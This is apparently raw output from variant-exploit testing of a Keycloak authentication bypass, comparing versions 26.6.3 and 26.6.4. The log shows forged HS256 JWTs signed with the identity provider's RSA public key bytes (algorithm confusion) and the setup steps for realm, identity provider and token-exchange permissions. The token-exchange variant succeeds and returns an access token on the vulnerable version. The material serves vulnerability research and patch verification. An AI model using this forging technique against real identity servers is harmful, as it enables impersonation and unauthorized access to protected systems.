=== Variant exploit against vulnerable Keycloak (keycloak-vuln-variant) === Admin token obtained. Create realm: 201 Realm issuer (expected client_assertion aud): http://localhost:8080/realms/test-realm RSA key pair generated. DER bytes: 294 Create oidc IdP (supportsClientAssertions=true): 201 Create federated-jwt client: 201 Forged client_assertion header: {"alg": "HS256", "typ": "JWT"} Forged client_assertion payload: {"iss": "https://external-idp-issuer", "sub": "external-client-sub", "aud": "http://localhost:8080/realms/test-realm", "exp": 1783266567, "iat": 1783266267, "jti": "90816e7f-f989-4f4e-85d1-469a2476c5c0"} HMAC secret = RSA public key DER bytes (294 bytes) Submitting forged HS256 client_assertion to token endpoint (client_credentials)... Response status: 401 Response body: {"error": "invalid_client", "error_description": "Invalid client or Invalid client credentials"} vulnerable: forged HS256 client_assertion REJECTED. Error: invalid_client, Description: Invalid client or Invalid client credentials === Variant exploit against fixed Keycloak (keycloak-fixed-variant) === Admin token obtained. Create realm: 201 Realm issuer (expected client_assertion aud): http://localhost:8080/realms/test-realm RSA key pair generated. DER bytes: 294 Create oidc IdP (supportsClientAssertions=true): 201 Create federated-jwt client: 201 Forged client_assertion header: {"alg": "HS256", "typ": "JWT"} Forged client_assertion payload: {"iss": "https://external-idp-issuer", "sub": "external-client-sub", "aud": "http://localhost:8080/realms/test-realm", "exp": 1783266575, "iat": 1783266275, "jti": "a82bbfe2-2591-42f8-b1de-7d2091f22e83"} HMAC secret = RSA public key DER bytes (294 bytes) Submitting forged HS256 client_assertion to token endpoint (client_credentials)... Response status: 401 Response body: {"error": "invalid_client", "error_description": "Invalid client or Invalid client credentials"} fixed: forged HS256 client_assertion REJECTED. Error: invalid_client, Description: Invalid client or Invalid client credentials === VARIANT SUMMARY === Vulnerable (26.6.3): forged HS256 client_assertion REJECTED Fixed (26.6.4): forged HS256 client_assertion REJECTED VERDICT: no_variant === Variant exploit against vulnerable Keycloak (keycloak-vuln-variant) === Admin token obtained. Create realm: 201 RSA key pair generated. DER bytes: 294 Create oidc IdP (hardcoded key): 201 Create federated user: 201 Create te-client: 201 Enable IdP mgmt permissions: 200 {"enabled":true,"resource":"434d5361-37a3-47dd-ad05-155b92b717c4","scopePermissions":{"token-exchange":"4ce3b70c-a977-47f6-b00f-238f3b254c50"}} Create client policy: 201 policy_id=c1c654f2-d4f8-47f8-88f4-52e31bb72435 Bind policy to token-exchange permission: 201 Forged HS256 subject_token header: {"alg":"HS256","typ":"JWT"} Forged HS256 subject_token payload: {"iss": "https://external-idp-issuer", "sub": "basic-user-id", "aud": "https://external-idp-issuer", "typ": "Bearer", "exp": 1783267466, "iat": 1783267166, "jti": "0e8509b6-557d-49a0-b674-65dd49d79baa"} HMAC secret = RSA public key DER bytes (294 bytes) Submitting external token exchange with forged HS256 subject_token... Response status: 200 Response body: {"access_token": "eyJhbGciOiJSUzI1NiIsInR5cCIgOiAiSldUIiwia2lkIiA6ICJla0E4RWMtelUxWEtwUXg2dHhxWTlmSF9WcVYtZHkxeEI5MzZJQUFfZFdBIn0.eyJleHAiOjE3ODMyNjc0NjYsImlhdCI6MTc4MzI2NzE2NiwianRpIjoib25ydG5hOjQwZTg4YmQ0LWIyNzItODVhYS1lYmM0LTc0NDhkNDhiYWEwNSIsImlzcyI6Imh0dHA6Ly9sb2NhbGhvc3Q6ODA4MC9yZWFsbXMvdGVzdC *** vulnerable: forged HS256 subject_token ACCEPTED! Access token received. *** Token sub: 16391078-5822-47ec-8f53-d15bf771c5f6 Token azp (client): te-client Token iss: http://localhost:8080/realms/test-realm === Variant exploit against fixed Keycloak (keycloak-fixed-variant) === Admin token obtained. Create realm: 201 RSA key pair generated. DER bytes: 294 Create oidc IdP (hardcoded key): 201 Create federated user: 201 Create te-client: 201 Enable IdP mgmt permissions: 200 {"enabled":true,"resource":"47b8e630-621e-44c0-b49b-f32e595a5005","scopePermissions":{"token-exchange":"1091757e-e7ed-45a0-83a7-dd85785c44d4"}} Create client policy: 201 policy_id=098bcc04-6f47-413b-a160-c18bf9c3fa62 Bind policy to token-exchange permission: 201 Forged HS256 subject_token header: {"alg":"HS256","typ":"JWT"} Forged HS256 subject_token payload: {"iss": "https://external-idp-issuer", "sub": "basic-user-id", "aud": "https://external-idp-issuer", "typ": "Bearer", "exp": 1783267473, "iat": 1783267173, "jti": "d4c11929-fefd-4748-9bc4-5da9f13e8c1f"} HMAC secret = RSA public key DER bytes (294 bytes) Submitting external token exchange with forged HS256 subject_token... Response status: 400 Response body: {"error": "invalid_token", "error_description": "invalid token"} fixed: forged HS256 subject_token REJECTED. Error: invalid_token, Description: invalid token === VARIANT SUMMARY === Vulnerable (26.6.3): forged HS256 subject_token ACCEPTED Fixed (26.6.4): forged HS256 subject_token REJECTED VERDICT: alternate_trigger === Variant exploit against vulnerable Keycloak (keycloak-vuln-variant) === Admin token obtained. Create realm: 201 RSA key pair generated. DER bytes: 294 Create oidc IdP (hardcoded key): 201 Create federated user: 201 Create te-client: 201 Enable IdP mgmt permissions: 200 {"enabled":true,"resource":"5fe55aff-cdcb-4835-8da1-6b4905afc6e5","scopePermissions":{"token-exchange":"0908b3e9-11c7-47fe-9810-aa0f01fb7fbd"}} Create client policy: 201 policy_id=13869bbb-7240-4190-a5b2-57c102bc9a62 Bind policy to token-exchange permission: 201 Forged HS256 subject_token header: {"alg":"HS256","typ":"JWT"} Forged HS256 subject_token payload: {"iss": "https://external-idp-issuer", "sub": "basic-user-id", "aud": "https://external-idp-issuer", "typ": "Bearer", "exp": 1783267514, "iat": 1783267214, "jti": "7f8aff31-2078-4872-a7d6-16911e2769bc"} HMAC secret = RSA public key DER bytes (294 bytes) Submitting external token exchange with forged HS256 subject_token... Response status: 200 Response body: {"access_token": "eyJhbGciOiJSUzI1NiIsInR5cCIgOiAiSldUIiwia2lkIiA6ICJ5R25qY1BsTFNPUG5YNm9LdTFiQmVGaS1qZ2JPMUVVd1dmanVoc0tzV0xjIn0.eyJleHAiOjE3ODMyNjc1MTQsImlhdCI6MTc4MzI2NzIxNCwianRpIjoib25ydG5hOmYzMmZhZDRjLTE3MjMtMmNkNS02ODBhLTQ0N2QzODAyOTFmYyIsImlzcyI6Imh0dHA6Ly9sb2NhbGhvc3Q6ODA4MC9yZWFsbXMvdGVzdC *** vulnerable: forged HS256 subject_token ACCEPTED! Access token received. *** Token sub: 22fc6dbd-ee3d-4057-8c20-19376de89dbf Token azp (client): te-client Token iss: http://localhost:8080/realms/test-realm === Variant exploit against fixed Keycloak (keycloak-fixed-variant) === Admin token obtained. Create realm: 201 RSA key pair generated. DER bytes: 294 Create oidc IdP (hardcoded key): 201 Create federated user: 201 Create te-client: 201 Enable IdP mgmt permissions: 200 {"enabled":true,"resource":"b673ddc1-1318-4c83-821b-a7b23cfc0436","scopePermissions":{"token-exchange":"101042a5-ba55-49b5-bd72-617bc38c374b"}} Create client policy: 201 policy_id=cfb09165-783f-450f-832f-169846cba84d Bind policy to token-exchange permission: 201 Forged HS256 subject_token header: {"alg":"HS256","typ":"JWT"} Forged HS256 subject_token payload: {"iss": "https://external-idp-issuer", "sub": "basic-user-id", "aud": "https://external-idp-issuer", "typ": "Bearer", "exp": 1783267521, "iat": 1783267221, "jti": "2ea8590a-8342-432b-b45d-3701d88cfa36"} HMAC secret = RSA public key DER bytes (294 bytes) Submitting external token exchange with forged HS256 subject_token... Response status: 400 Response body: {"error": "invalid_token", "error_description": "invalid token"} fixed: forged HS256 subject_token REJECTED. Error: invalid_token, Description: invalid token === VARIANT SUMMARY === Vulnerable (26.6.3): forged HS256 subject_token ACCEPTED Fixed (26.6.4): forged HS256 subject_token REJECTED VERDICT: alternate_trigger